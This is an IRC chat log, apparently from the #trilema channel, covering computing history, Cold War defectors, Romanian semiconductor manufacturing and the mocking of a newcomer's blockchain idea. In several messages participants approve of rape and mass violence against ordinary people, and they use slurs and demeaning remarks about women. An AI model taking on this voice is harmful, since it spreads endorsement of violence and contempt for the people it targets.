a) someone was going to make a billion dollars and b) it'd have been preferable it not be gates & jobs. 1738342;1510694381;asciilifeform;re (b) neither of'em was pictured as in same market at all, any moar than pepsicola 1738343;1510694419;asciilifeform;sorta how northrop does not see itself in competition with cessna 1738344;1510694425;mircea_popescu;i could reinterpret the objection in the terms of "mit ai lab had no common ideology", a copacetic statement of "they failed to republic" which is exactly what i meant by http://btcbase.org/log/2017-11-14#1738294 and so on. 1738345;1510694425;a111;Logged on 2017-11-14 20:43 mircea_popescu: no conception of who the enemy is and why exactly, etcetera. 1738346;1510694443;mircea_popescu;asciilifeform the matter was fluid in 1980. could have been. 1738347;1510694485;mircea_popescu;nytimes also didn't "picture itself in competition with the weird net kids". and so following, chuck e cheese dude's "ipad restaurant" didn't see itself in competition with phones. "it's a restaurant". no it's not. 1738348;1510694614;asciilifeform;re ai lab -- mircea_popescu how do you picture a buncha taxpayer-funded academics not-'failing-to-republic' , hypothetically ? 1738349;1510694623;asciilifeform;what would this look like 1738350;1510694636;mircea_popescu;same way the same exact item opened cannon fire at the "taxpayers" from atop the walls of oxford. 1738351;1510694636;asciilifeform;they move to amish countryside and make lispms out of grass ? 1738352;1510694655;mircea_popescu;nope. they drag the local barristas into the campus by the hair to be raped for a weekend at a time. 1738353;1510694656;asciilifeform;oxford was a kind of su, or ro if you like, self-fueling 1738354;1510694669;mircea_popescu;so ? who made it that way, king bohemius the 9th ? 1738355;1510694688;asciilifeform;the fact that it was solar-powered ? 1738356;1510694694;mircea_popescu;change college admission to be more like arrest, for one thing. 1738357;1510694712;asciilifeform;^ as depicted in stephensen's 'anathem' aha ! 1738358;1510694727;mircea_popescu;("oh, romanian gymnasts!!!" "yeah, right. you are aware none of the girls actually wanted to be there, yes ?") 1738359;1510694728;asciilifeform;( he worked entire fictional portrait of what imho is proper university... ) 1738360;1510694795;mircea_popescu;but leaving these proper statements aside -- never mind the civilisational aspect, limit yourself to culture. they might've bothered to realise the only enemy is the taxpayer, moved to limit his impact on government. exactly as the medieval collegiate disputes flew. 1738361;1510694832;mircea_popescu;there were two groups worth the mention during "golden age" of europe : mechants, and scholars. the prime characteristic of either ? immune to common law process! 1738362;1510694842;asciilifeform;superficially their scheme works to this day -- i.e. 'you can elect anyone you like, but he'll be a harvaprinceyalton graduate, muhahaha' 1738363;1510694850;mircea_popescu;merchants had merchant code, scholars had what meanwhile became an universalised immunity, "first conviction walk" 1738364;1510694867;mircea_popescu;asciilifeform except it doesn't do anything. works like a painting works. 1738365;1510694893;asciilifeform;at this point that describes their whole civilizational shebang, the hollow husk 1738366;1510694904;asciilifeform;but originally -- worked. or how do you suppose the 'ivies' got, and stayed, fat. 1738367;1510694918;mircea_popescu;fatness is not a goal of anything but pigs. 1738368;1510694944;mircea_popescu;the important point is to be able to make the world make fucking sense against the constant yelps of the idiots who want the world to be comfortable. 1738369;1510694952;mircea_popescu;and thereby, an ivory on every desk not a fucking windows. 1738370;1510694969;mircea_popescu;and if this takes putting a few million instagramers on stakes, ALL THE BETTER. 1738371;1510694988;asciilifeform;the winblowz item still strikes me as anachronistic, rather like the supposition that men killed tyranosaur. 1738372;1510694992;asciilifeform;the 2 were not contemporaneous. 1738373;1510695008;mircea_popescu;that final "all the better" being the republic part. they failed to construct this system whereby extreme violence applied to everyone else was a net positive, in and of itself, for no other reason. 1738374;1510695026;mircea_popescu;asciilifeform 1983 to 1985 is 3600, yes ? 1738375;1510695037;asciilifeform;1980-86 approx yea 1738376;1510695048;asciilifeform;( e.g. my 3620 was circa '86 ) 1738377;1510695054;mircea_popescu;1981, gates (and allen) struck ibm deal 1738378;1510695056;mircea_popescu;that made them exist. 1738379;1510695064;mircea_popescu;how not EXACT contemporaries ? 1738380;1510695068;asciilifeform;by that token jobs existed in '77 neh 1738381;1510695077;mircea_popescu;thjat is the ~only token re windows. 1738382;1510695078;asciilifeform;the 'mouse spores' were indeed, yes, present 1738383;1510695084;asciilifeform;hm ok i see it 1738384;1510695090;mircea_popescu;in 1982 microsoft was fully built. 1738385;1510695095;mircea_popescu;it was nothing else hence. 1738386;1510695133;asciilifeform;until mid '90s nobody even in bad dreams considered it a threat to industrial iron tho. 1738387;1510695138;mircea_popescu;SO ? 1738388;1510695156;mircea_popescu;until macrosensible nobody even in bad dreams considers the cancer a threat. 1738389;1510695164;asciilifeform;right. 1738390;1510695164;mircea_popescu;it's there whether considered or disconsidered. 1738391;1510695345;mircea_popescu;the over-reaching all-important point is that had the dudes of 1985 produced an ideologically-closed system, by 1995 there'd have been a WHERE for people to go, other than windows. 1738392;1510695363;asciilifeform;aha 1738393;1510695381;asciilifeform;( see also http://btcbase.org/log/2017-11-07#1733724 observation ) 1738394;1510695381;a111;Logged on 2017-11-07 22:59 asciilifeform: this is the fate of all 'we don't have an ideology' derps 1738395;1510695400;mircea_popescu;(closed here means "without externalities" rather than anything else) 1738396;1510695411;asciilifeform;ideology is the only working pill against 'market can stay irrational longer than you can stay solvent' 1738397;1510695424;mircea_popescu;possibly there be others. 1738398;1510695436;asciilifeform;possibly, but not discovered yet. 1738399;1510695447;mircea_popescu;moreover -- doubtful pill. didn't help soviets ; didn't help romanians. 1738400;1510695465;mircea_popescu;the latter needed moar size ; the former a better ideology. evidently worked for eg china, so there is some tolerance. 1738401;1510695484;asciilifeform;it isn't an invincibility pill 1738402;1510695557;asciilifeform;but the moar i dig into ro , the more astonishing the level of fight it was able to put up 1738403;1510695560;asciilifeform;against the mcbeast. 1738404;1510695575;asciilifeform;and for how long. 1738405;1510695578;mircea_popescu;in this light quite remarkable, yes. 1738406;1510695617;mircea_popescu;you recall that (uncharacteristically well written) orlov article re "power of nyet" ? 1738407;1510695622;asciilifeform;aha ! 1738408;1510695637;mircea_popescu;very much it. extremely easy to defeat ustardation : just say no. it helps if you have a fully built system providing an alternative. 1738409;1510695658;asciilifeform;( tho i liked the other one -- http://btcbase.org/log/2014-07-28#774690 -- moar ) 1738410;1510695658;a111;Logged on 2014-07-28 19:19 asciilifeform: 'Learn not to participate - to the point of utter impossibility of meeting the enemy 'half-way' - and you will see that inside there lay a very useful mindfuck: in learning to 'nonparticipate,' in fact you drew out your *will* from its scabbard - to which it seemed so securely riveted by your upbringing. The appearance of *your will* changes everything and forever. With your own will slipped into your boot knife 1738411;1510695692;mircea_popescu;but anyway, in spite of an inability to speak in public, or to make sense, extemporaneously or not, ceausescu was a major player in the status quo of 70s and 80s. that whole "don't mix into the affairs of others", very strong nationalism, managed to paralyze the us-owned and hosted un for two decafdes. 1738412;1510695745;asciilifeform;not much of a talker, but he was quick enuff on his feet ( pointedly unlike the su gerontocrats ) 1738413;1510695780;asciilifeform;also he had an actual nation, properly speaking, and made full use of the fact 1738414;1510695798;mircea_popescu;ya prolly better statement. 1738415;1510695802;asciilifeform;( nationalism dun work in usa because with what; and verboten in su because ottoman-style empire ) 1738416;1510695827;mircea_popescu;asciilifeform in the long run, stalin's internationalism proved the terribly wrong strategy. shoulda went with trotsky. 1738417;1510695839;mircea_popescu;trotsky too idiotic to have stalin killed back when he could. 1738418;1510695854;asciilifeform;by some accounts, d00d JustWanted(tm) 1738419;1510695964;mircea_popescu;kinda why the whole ww2 made him so trotsky-sensitive, too. 1738420;1510696048;mircea_popescu;https://www.youtube.com/watch?v=JUfeuosbeJg << 1968 speech. "invasion a mistake and inconceivable outrage" most of the applause THAT time is genuine. "no justification available and no reasoning may be accepted" and so on. 1738421;1510696087;asciilifeform;http://btcbase.org/log/2017-11-14#1738408 << at the risk of repeating ancient thread, imho if there were a ready alternative ( as in geographic , rather than merely ideological ) to usa, for the remaining ~functional people to defect to -- usa wouldn't last a week 1738422;1510696087;a111;Logged on 2017-11-14 21:40 mircea_popescu: very much it. extremely easy to defeat ustardation : just say no. it helps if you have a fully built system providing an alternative. 1738423;1510696106;asciilifeform;or at the very least would retain the threadbare sanity of usa circa 1980s 1738424;1510696112;mircea_popescu;this is dubious. will last, china likes it. 1738425;1510696128;asciilifeform;china would make penal colony there, or something useful. 1738426;1510696147;mircea_popescu;nah. it's already very much siberia as far as they're concerned. 1738427;1510696156;mircea_popescu;fwis generally send shitty sons. 1738428;1510696270;asciilifeform;afaik feeling is quite mutual : to my knowledge no white man to date defected, properly speaking, to the rice kingdom 1738429;1510696277;mircea_popescu;a, lots. 1738430;1510696297;asciilifeform;anyone i might know of ? 1738431;1510696385;mircea_popescu;not usually advertised, but the expat community large indeed. 1738432;1510696411;asciilifeform;( plenty of folx from, e.g., ru, living and working in cn. but i am speaking of ~defectors~, as in 'i'd rather have a flat in pekin than continue as lt. colonel at nsa ' ) 1738433;1510696450;asciilifeform;a defector as i understand the word, is a honoured guest of the crown 1738434;1510696482;asciilifeform;rather than simply i buy a plane ticket. 1738435;1510696518;asciilifeform;it is when the folx on ~other end~ buy you plane ticket. or for that matter whole plane. and villa. etc 1738436;1510696534;mircea_popescu;the problem with this is that soviet military man valuable ; chinese valuable ; romanian evidently valuable. what value does us tard bring ? 1738437;1510696546;mircea_popescu;it's like asking about "flea defectors". parasytes dun meaningfully defect. 1738438;1510696549;asciilifeform;tard none 1738439;1510696555;asciilifeform;mr. reti -- possibly value 1738440;1510696564;mircea_popescu;not with his current mannerisms. 1738441;1510696592;asciilifeform;hey for all i know pacepa also stuttered 1738442;1510696663;mircea_popescu;you'\re still missing the important point. usg is looking for a brand to show its large citizenry. much like every attempt to hold a tech fconference in argentina degenerates into a bunch of local tards speaking/stepping over each other to blather meaninglessly in the hope of thereby attaining a certificate of humanhood from the foreigners, 1738443;1510696672;mircea_popescu;just so ustards are going to buy pacepa's nonsensical books. 1738444;1510696693;mircea_popescu;the equivalent population does not exist, it's an epiphenomenon of collapsed colonies, like argentina, like america. 1738445;1510696714;asciilifeform;su did hire martin & mitchell 1738446;1510696716;mircea_popescu;it's not common for eg greeks or italians to go crazy over "the beatles", they simply make a local band like that and that's it. 1738447;1510696721;asciilifeform;that they did not enjoy it so much, was their own problem 1738448;1510696738;mircea_popescu;buncha defectors since korean war to china, but ... not nearly the same interest. 1738449;1510696747;asciilifeform;because nobody wants fucking rice, lol 1738450;1510696786;mircea_popescu;i suspect because no one wants americans for any purpose. 1738451;1510696814;asciilifeform;su found a use for martin&mitchell. and buncha other similars. even for oswald, lol 1738452;1510696847;asciilifeform;but naturally 'americans' dun get to defect, you gotta actually be someone 1738453;1510696866;asciilifeform;moar specific than just 'd00d with black passport' 1738454;1510696874;asciilifeform;!!up fromloper 1738455;1510696875;deedbot;fromloper voiced for 30 minutes. 1738456;1510696880;asciilifeform;fromloper: who goes there 1738457;1510696894;mircea_popescu;asciilifeform i can't think of a competent anyone in the whole us army/navy/airforce brass. 1738458;1510696927;mircea_popescu;what exactly could you possibly use one for ? not like they even have the usual value of "stolen documents", i guarantee you if you examed the O-paygrade you'd find not a single soul as well informed as the famous contractor/defector. 1738459;1510696930;asciilifeform;engineers likely to know moar , i suspect, than general. and cost less. 1738460;1510696932;fromloper;Somehow manage to get here by clicking on contact. 1738461;1510696934;mircea_popescu;or i guess you don't count that one ? 1738462;1510697003;asciilifeform;mircea_popescu: defectors come in 'doing' shape as well as 'knowing' 1738463;1510697009;asciilifeform;e.g. skilled folx 1738464;1510697048;fromloper;This is however more pleasing to my eyes than the other black and green one 1738465;1510697053;mircea_popescu;well in this sense whole dnc long defected to china, moved desperately to prevent ru-us rapproachment back in the early days of 2016 when sitll possible. 1738466;1510697065;asciilifeform;fromloper: wai wat ? 1738467;1510697083;fromloper;http://logs.bvulpes.com/trilema 1738468;1510697093;asciilifeform;mircea_popescu: in situ traitors are not properly speaking defectors 1738469;1510697102;asciilifeform;i.e. they dun dream to live out the rest of their days in pekin 1738470;1510697162;mircea_popescu;well how do you know what they dream etc. 1738471;1510697166;fromloper;Any discussion about btc or bch today? 1738472;1510697182;asciilifeform;fromloper: you just linked to a logtron. with search. 1738473;1510697198;asciilifeform;fromloper: could readily answer the question with your own hands. why do you ask people to do the work of machine for you ? 1738474;1510697235;asciilifeform;normally i would assume fromloper does not know about the log ( even though log is linked in subj line of #trilema ...! ) 1738475;1510697241;asciilifeform;but in this case even that excuse is not available 1738476;1510697246;asciilifeform;so fromloper what gives ? 1738477;1510697262;mircea_popescu;lol dood clicked a link, landed in pot. 1738478;1510697287;*;asciilifeform must invoke herr babbage, 'i cannot rightfully apprehend the confusion of ideas...' 1738479;1510697360;fromloper;I was in the http://www.loper-os.org and clicked on contact and landed in this nice pot. 1738480;1510697373;asciilifeform;fromloper: relax, enjoy warm water 1738481;1510697395;asciilifeform;generally noobs are advised to read the log for a spell, before considering whether they have something to say 1738482;1510697454;asciilifeform;mircea_popescu: re 'defectors' it is a quite nostalgic subject for asciilifeform , because it is an item from meanwhile wholly vanished, like roman empire, age, where escape from an empire was simply a matter of getting through a wall 1738483;1510697492;fromloper;ascii I have been reading logs when i relevant, also Trilema site. 1738484;1510697502;asciilifeform;( even despite the 'being someone' point, consider that 1 sailor who jumped from sov ship. usa did not send him back... ) 1738485;1510697503;fromloper;What happened to qntra site 1738486;1510697506;BingoBoingo; d00d was in no sense in control tho << Most bureaucrats aren't 1738487;1510697518;BingoBoingo;Bureacrats read scripts 1738488;1510697528;mircea_popescu;i don't think this subject of your nostalgia ever existed outside the vhs world. it's like muller. 1738489;1510697550;asciilifeform;it was able to exist when the wall was reasonably tight. 1738490;1510697566;mircea_popescu;i dunno 1738491;1510697572;asciilifeform;( and when the aspiring escapees, i suspect, were the upper cut of the bell curve ) 1738492;1510697593;mircea_popescu;consider -- various mexican jumped border, us sent back. 1738493;1510697602;mircea_popescu;but in general -- did not send. 1738494;1510697604;asciilifeform;because they're seeking welfarola. 1738495;1510697608;mircea_popescu;this makes a point of some kind ? 1738496;1510697610;asciilifeform;and wall not so tall to begin with 1738497;1510697614;mircea_popescu;ahahaha wait, and the sailor did not ? 1738498;1510697619;mircea_popescu;!!up abrelosojos 1738499;1510697620;deedbot;abrelosojos voiced for 30 minutes. 1738500;1510697633;asciilifeform;the sailor afaik just wanted out 1738501;1510697635;mircea_popescu;i seem to recall every single wall jumper net drain on puyblic chest for whole life. 1738502;1510697661;asciilifeform;dunno if it makes sense to call, e.g., pacepa, net drain 1738503;1510697676;asciilifeform;he did what whole army could not do 1738504;1510697676;mircea_popescu;rly ? cuz what, he had a martha stewart type show on tv ? 1738505;1510697696;asciilifeform;they sent whole ro kgb residentura in usa packing, neh 1738506;1510697732;asciilifeform;did moar counterintel 'bang for buck' in 5min than whole usg in 50yrs 1738507;1510697739;mircea_popescu;ro didn't really have agents in the us. 1738508;1510697747;asciilifeform;so, what, whole yarn disinfo ? 1738509;1510697757;mircea_popescu;ro did europe, mostly, kgb did us, mostly. they interoped. 1738510;1510697777;mircea_popescu;(kgb also did europe, because paranoid. not very good, but ample resources) 1738511;1510697789;mircea_popescu;asciilifeform well, whbich yarn ? 1738512;1510697801;asciilifeform;e.g. 'horizons' 1738513;1510697812;asciilifeform;he goes on, and on, re residents in usa 1738514;1510697830;asciilifeform;and later was given cia medal ( afaik the only runaway to be awarded ) 1738515;1510697875;mircea_popescu;right, and he survived because he scared them off. laissez. 1738516;1510697913;asciilifeform;i've no clue why survived ( and it is by far not the only puzzle re the d00d ) 1738517;1510697922;mircea_popescu;this notion that ra-ra-ra usa-america is very much post 2000 nytimes construction. people in the 60s gave almost no shits about the us, unless like the italians they cxould directly leach. 1738518;1510697929;asciilifeform;possibly they kept him in whitehouse basement for 20yrs, whynot. 1738519;1510697953;asciilifeform;pacepa describes the afaik factual reason why his master gave a shit : semiconductor 1738520;1510697963;asciilifeform;it was the first and last thing to properly speaking happen in usa. 1738521;1510697965;mircea_popescu;people wanted to see italian films with antonelli, and french stuff, not hollywood nonsense. 1738522;1510697980;mircea_popescu;romanians got them from the soviets as a general rule. 1738523;1510697984;mircea_popescu;via switzerland or directly. 1738524;1510697992;asciilifeform;not according to pacepa 1738525;1510698001;mircea_popescu;well what can i tell you. 1738526;1510698002;asciilifeform;su had problems lifting equipment wholesale 1738527;1510698032;mircea_popescu;problems, everyone has. 1738528;1510698073;mircea_popescu;but eg, the pdp the romanians cloned was obtaind via soviets. the z80s were all swiss sourced. 1738529;1510698082;asciilifeform;according to pacepa -- su paid hard cash for what ro was able to lift from, e.g., texas instruments, hewlett-packard, the other giants. 1738530;1510698105;BingoBoingo; What happened to qntra site << The isp quite on us. Hopefully Qntra returns ~December 15th. 1738531;1510698106;asciilifeform;z80 was pre-vlsi item. think early '70s. 1738532;1510698106;mircea_popescu;a dubious story altogether. 1738533;1510698118;mircea_popescu;asciilifeform early 70s was too late for pacepa lol. 1738534;1510698136;asciilifeform;at any rate i was not sitting with pacepa playing with vlsi, cannot say what part fact, what -- fiction 1738535;1510698185;asciilifeform;mircea_popescu: defected in '78 neh 1738536;1510698198;mircea_popescu;me either, nor could he have. anyway, to recap -- dood was chief of ro belin residency. once retired (from field work), about simultaneous with ceausescu ascension, was promoted to strategy role in bucharest. 1738537;1510698234;mircea_popescu;asciilifeform yes but by the 70s his active duty time was over. 1738538;1510698312;fromloper;Has anyone here ever discussed solving btc blockchain capacity problem? 1738539;1510698313;mircea_popescu;defected as a 50yo. a 50yo ready to claim oswald worked for kgb. 1738540;1510698322;mircea_popescu;fromloper what problem is that ? 1738541;1510698334;asciilifeform;fromloper: how does one go about solving a wholly fictional problem ? 1738542;1510698365;fromloper;MP The ever increasing amount of data 1738543;1510698394;asciilifeform;fromloper: how would you propose to make a bitcoin without monotonically increasing data set ? 1738544;1510698398;mircea_popescu;http://trilema.com/2015/lets-address-some-of-the-more-common-pseudo-arguments-raised-by-the-very-stupid-people-that-like-the-gavin-scamcoin-proposal/#selection-113.0-113.81 << revisit 2015. 1738545;1510698419;mircea_popescu;things don't change just because new generation of lambs came out of pregnant ewes this spring like each othe rspring before it. 1738546;1510698425;fromloper;mp read that. 1738547;1510698439;mircea_popescu;the claim would be more presuasive had you referenced it. 1738548;1510698472;fromloper;I have been looking into it and maybe there is a solution. However i am no expert computer programmer 1738549;1510698496;asciilifeform;fromloper: what is the problem to which you wish to see 'a solution' ? 1738550;1510698518;mircea_popescu;asciilifeform consider : pacepa defected in bonn. why not in new york ? except if there was 0 reason for the spy chief to ever go to new york. and his period item (letter to dana) is knee deep in eurocentric issues. noel bernard, srsly ? who the fuck cares about noel bernard. 1738551;1510698545;asciilifeform;mircea_popescu: again not having been there, cannot say. but presumably more watched by politruk, say, in nyc, than in bonn 1738552;1510698553;fromloper;Banks curently keep a records of all txs and each account holder gets a personal statement 1738553;1510698555;asciilifeform;some element of planets-aligned-correctly 1738554;1510698565;mircea_popescu;asciilifeform he was the nominal chief of the whole shebang. 1738555;1510698581;mircea_popescu;and he went to the hot spot of the whole shebang, which was teh germanies. 1738556;1510698588;mircea_popescu;i'm telling you. romania mostly did europe. 1738557;1510698633;fromloper;Blockchain could be redesign to hold the data and each address and balance over 1 sat. each user would have their own mini blockcahin of txs and not others. 1738558;1510698641;mircea_popescu;and yes soviets paid occasionally for ro sourced tech. it was without known exception (to me) sourced in eg france. 1738559;1510698644;asciilifeform;he describes the usa trips as specifically for the purpose of building cred, to get access to semiconductor goodies 1738560;1510698646;mircea_popescu;!!down fromloper 1738561;1510698659;mircea_popescu;describes in 1980. 1738562;1510698667;asciilifeform;lol this fromloper was the saddest one to date iirc 1738563;1510698712;asciilifeform;BingoBoingo: they dun make pinoys like they usedta. 'each user would have their own mini blockcahin of txs and not others' 1738564;1510698730;asciilifeform;this has got to be a new record. 1738565;1510698755;mircea_popescu;they're fucked in the head, it's a cultural disease. 1738566;1510698768;mircea_popescu;"everyone will be main player in his own world of warcraft!" 1738567;1510698770;asciilifeform;this is something yet else, gotta be saturnism or the like 1738568;1510698774;BingoBoingo;So do we contact Fort Meade or jolo to get an RMA number for this one 1738569;1510699155;mircea_popescu;asciilifeform anyway, to put things in readily meaningful perspective : you going "oh shit, we can use this bit i dug up out of bernstein to improve phuctor speed" is 100% what a PRIME example of such "sourced tech" would have been. that the soviets'd have paid for and the whole project involved would be decorated and congratulated after taking however long, 18 months to do it. 1738570;1510699184;asciilifeform;well yes it's what asciilifeform's father did for a living 1738571;1510699192;asciilifeform;and million other people 1738572;1510699200;mircea_popescu;that was the level. the problem with the romanians wasn't that they couldn't steal -- of course they could ; nor that it was in any way immoral or dubious to steal -- holy hell, country-in-development trying to catch up with technology, a good half of the techs involved were sympathetic anyway. 1738573;1510699215;mircea_popescu;it was that a) it didn't know what to steal (as per above re lisp) and b) it couldn't steal fast enough. 1738574;1510699217;mircea_popescu;this b especially. 1738575;1510699230;asciilifeform;well there was also a (c) 1738576;1510699236;asciilifeform;as illustrated by kurt tank in argentina 1738577;1510699239;mircea_popescu;not afaik. 1738578;1510699242;mircea_popescu;hm ? 1738579;1510699255;asciilifeform;i.e. 'where do you plug in the electron microscope in goatfuckistan' problem 1738580;1510699262;mircea_popescu;no such problem. 1738581;1510699286;asciilifeform;it was a problem even for asciilifeform's father, cloning film projectors and discovering that the necessary spring steel could not be had 1738582;1510699290;mircea_popescu;for one thing, 60s and 70s tech was not really advanced enough in this sense ; for the other, ro actually had better experts than the us had. just -- not enough of them. 1738583;1510699305;asciilifeform;better expert does not necessarily make the necessary spring available in qty. 1738584;1510699307;mircea_popescu;think -- the whole romanian section of ms/google etc was... in romania. that previous generation. 1738585;1510699330;mircea_popescu;asciilifeform romania was moar industrialized than the soviets, in this sense. had fine alloys. had fine mechanics, everything. 1738586;1510699341;mircea_popescu;like czechs exactly (another major source of soviet such needs) 1738587;1510699347;asciilifeform;or like gdr 1738588;1510699348;mircea_popescu;but the czechs -- even fewer. 1738589;1510699354;mircea_popescu;those -- brand apart. 1738590;1510699365;mircea_popescu;let's say "somewhat like" 1738591;1510699376;asciilifeform;( by some accounts ru strategic telecom ~to this day~ runs on gdr iron ) 1738592;1510699384;mircea_popescu;seems likely. 1738593;1510699525;asciilifeform;before i fughet, here's asciilifeform's microscopy crackpottery of the day : contact print. consider, 370,000 transistors, on item roughly 1cm x 1cm. attach to standard ccd, say the 25 megapixel sort, and image with e.g. soft xray. 1738594;1510699610;mircea_popescu;anyway. between this, "tech spying" and a whole lot of coutnerintel and military wankery, you've 99% of ro activity in the cold war. the former half minor in the early part and growing monotonously to come to overshadow latter part by 70s. 1738595;1510699629;mircea_popescu;the pacepa nutteries with assassinations etc -- footnote, if present. then, as now, ~nobody gave a shit. 1738596;1510699645;asciilifeform;semiconductor -- was the item about which gave a shit. 1738597;1510699663;mircea_popescu;you know ro made its own semiconductors. what exactly ? 1738598;1510699712;mircea_popescu;!~google iprs baneasa 1738599;1510699713;jhvh1;mircea_popescu: ROMÂNIA FURATĂ. IPRS Băneasa , cumpărată la preţ de maşină de ...: ; ROMÂNIA FURATĂ. IPRS Băneasa , o uzină cumpărată cu acte false ...: (1 more message) 1738600;1510699714;asciilifeform;was able to make because good tech intel work, neh. 1738601;1510699727;asciilifeform;rather than burning the 1000 manyears to bake from 1st principles 1738602;1510699737;mircea_popescu;^ 20 acre compound in bucarest. started production 62. 1738603;1510699748;asciilifeform;what did they make in '62 ? 1738604;1510699767;asciilifeform;afaik in '62 su made strictly diode and transistor 1738605;1510699775;asciilifeform;( as in , discrete items ) 1738606;1510699779;mircea_popescu;well i had the catalogs by year somewhere 1738607;1510699805;BingoBoingo;In other lessons learned today, Montevideo free trade zone offers tax savings... Which at ISP scale would swiftly be consumed by "user fees" to the operator of the zona franca 1738608;1510699893;mircea_popescu;so, in 1962 they had germanium doped transistors. under ~license~ you get this, thomson csf. 1738609;1510699907;asciilifeform;pretty neato tho 1738610;1510699914;mircea_popescu;1963 first self-produced item, photodiode. 1738611;1510699923;mircea_popescu;and fluorescent lamp starters. 1738612;1510699940;asciilifeform;notbad. in 1953 was what, plows. 1738613;1510699940;mircea_popescu;1964 export diodes to france, 1966 first ic. 1738614;1510699978;mircea_popescu;then they made automated coil makers, and various production line automatics 1738615;1510699997;mircea_popescu;(this is 99% of what they did, even the z80 clones were intended for production line control, which it was hard to get one at home0 1738616;1510700028;asciilifeform;in su also for production lines. and for artillery. 1738617;1510700029;mircea_popescu;!~google doina didiv 1738618;1510700030;jhvh1;mircea_popescu: Doina Didiv Profiles | Facebook: ; Doina Didiv | Facebook: ; Petition · Donald Trump: Americans want their Doina ! · Change.org: 1738619;1510700038;mircea_popescu;^ many years chief-of-C (ic section) 1738620;1510700066;asciilifeform;'What is Doina, you ask? Is it a candy bar? A protein bar? Does it contain meat, or is it gluten free and vegan? I. Don't. Know.' << lol!! 1738621;1510700076;asciilifeform;( from last link ) 1738622;1510700084;mircea_popescu;meh, nuts. 1738623;1510700085;mircea_popescu;lessee 1738624;1510700132;mircea_popescu;http://www.qsl.ro/yo3ccc/O%20viata%20dedicata%20componentelor%20electronice%20marca%20IPRS-Baneasa%20Doina%20Didiv/index.html << period photo collection 1738625;1510700154;mircea_popescu;woman, 3rd on top line. 1738626;1510700157;asciilifeform;oh hm 1738627;1510700217;mircea_popescu;http://p.bvulpes.com/pastes/Dls7o/?raw=true << interview. possibly dude still answers to callsign 1738628;1510700263;mircea_popescu;http://www.qsl.ro/yo3ccc/Cum%20arata%20drezina%20blindata%20folosita%20de%20Ana%20Pauker/slides/AP01.html#picttop << dood has various interestingobilia, incl ana pauker's traintrack-armoredcar. 1738629;1510700296;asciilifeform;( in further continuation of the microscopy q : what the everliving fuck happened to the beta ray microscope ? theoretically can do ~same thing as sem, but no need for massive electron gun, million volt power supply, or the vacuum pumps. where is it ?? ) 1738630;1510700310;mircea_popescu;heh 1738631;1510700390;mircea_popescu;check her out, exporting 3 inch silicium monocrystals. 1738632;1510700391;asciilifeform;mircea_popescu: that car looks like it were shot ? 1738633;1510700396;mircea_popescu;well yes. 1738634;1510700416;asciilifeform;but pauker died of cancer neh 1738635;1510700441;mircea_popescu;afaik 1738636;1510700472;asciilifeform;and what even was the reason for such an odd vehicle 1738637;1510700479;mircea_popescu;who even knows! 1738638;1510700489;asciilifeform;i've seen draisines on the railroad many times. but repair trucks, not limo. 1738639;1510700501;mircea_popescu;i know, that's why i linked. dood has all sorts of weird. 1738640;1510700507;asciilifeform;verily. 1738641;1510704412;asciilifeform;in other lulz, asciilifeform buys a chinesium hf-to-120mhz upconverter thing for rtlsdr , and discovers that he has to take the thing apart and trace pcb traces, and crosscheck with chipset data sheet, to learn which hose is 'in' and which is 'out' ! they did not bother to label ! ( not even in chinese . ) 1738642;1510704806;BingoBoingo;lol 1738643;1510704895;doppler;wow, nice going guys 1738644;1510705125;BingoBoingo;doppler: On what? 1738645;1510705153;doppler;on designing that PCB 1738646;1510705507;BingoBoingo;!!up hubud 1738647;1510705507;deedbot;hubud voiced for 30 minutes. 1738648;1510705542;BingoBoingo;From the fake oped mines: "Hey, Tech Companies: Knock It Off With the Apps That Let People Change Their Skin Color" 1738649;1510705562;doppler;asciilifeform: it was an ebay find, right? 1738650;1510705596;mircea_popescu;doppler what are you on about ? 1738651;1510705600;mircea_popescu;be specific. 1738652;1510705622;doppler;what's confusing? ascii is talking about an upconverter he bought. 1738653;1510705639;mircea_popescu;ah. 1738654;1510705642;doppler;I wasn't saying nice going to you guys :) 1738655;1510705669;mircea_popescu;asciilifeform is one guy as far as anyone knows. 1738656;1510705722;mircea_popescu;asciilifeform i have utterly no patience to listen to this kalman thing. i made it 13 minutes, but a) terrible snr and b) his voice is insufferable. 1738657;1510705861;ben_vulpes;BingoBoingo: transracialism is a thing! 1738658;1510705867;BingoBoingo;In further developments, little miss trainwreck has just had a tire swapped on her motor carriage for the 7th time in 2 weeks 1738659;1510705878;mircea_popescu;who ? 1738660;1510705888;ben_vulpes;is she buying really really really used tires? spares only? 1738661;1510705900;mircea_popescu;is this code for "bb got laid" 1738662;1510705907;ben_vulpes;bb has a mentee i think? 1738663;1510705911;BingoBoingo;mircea_popescu: Girl I've been driving around as favor for her sponsor. 1738664;1510705957;mircea_popescu;in other lulz, "sponsor" is how you say "dude paying for the rent" in slang of romanian student/whore (pitipoanca). 1738665;1510705982;BingoBoingo; is she buying really really really used tires? spares only? << Today she figured out rim was cracked and that's why hey were going flat. 1738666;1510706015;ben_vulpes;quit drivin on the sidewalls girl 1738667;1510706134;BingoBoingo;Lol, her sponsor is a a lady who is trying to guide miss trainwreck through 12 steps and figured "Hey, she needs to learn how to make friends. BingoBoingo, here's a chance to practice some patience and let her try to be your friend" 1738668;1510706171;mircea_popescu;from experience women that failed to make friends by the age of about 13 or so will never manage. 1738669;1510706223;BingoBoingo;Well, mentally when you account for the years lost to dopeism 1738670;1510706253;mircea_popescu;i guess there's that. 1738671;1510706294;*;BingoBoingo does not plan to take little miss trainwreck to Montevideo 1738672;1510706400;asciilifeform;mircea_popescu: at some point i'ma 'fan-sub' the thing (unless somebody else gets to it 1st) 1738673;1510706421;asciilifeform;doppler yes it's an ebayism howdja guess 1738674;1510706429;asciilifeform;cheap, angry 1738675;1510706448;doppler;always fun 1738676;1510706770;BingoBoingo; is this code for "bb got laid" << Nah, she's a white girl. Practically has a Cherenkov glow of warning signs, but is making an effort to stay sober. Is however a source of entertainment watching the petite weapon of mass destruction operate. Much as the BingoBoingo is a valuable customer service lab, driving this kitten around is valuable wmd development lab. 1738677;1510706877;BingoBoingo;And she pays cash for chauffer service 1738678;1510707667;asciilifeform;ftr $item dunwork. 1738679;1510707680;asciilifeform;f--- would not chinesiate again 1738680;1510708315;BingoBoingo;That corresponds to my experience negotiating with the (Cantonese speaking) chinese 1738681;1510708807;BingoBoingo;!~later tell danielpbarron http://wotpaste.cascadianhacker.com/pastes/UpHBe/?raw=true 1738682;1510708807;jhvh1;BingoBoingo: The operation succeeded. 1738683;1510708811;phf;hehe, somehow i read every single thing that BingoBoingo wrote about the girl as some form of double entedre 1738684;1510708829;phf;the explanations only 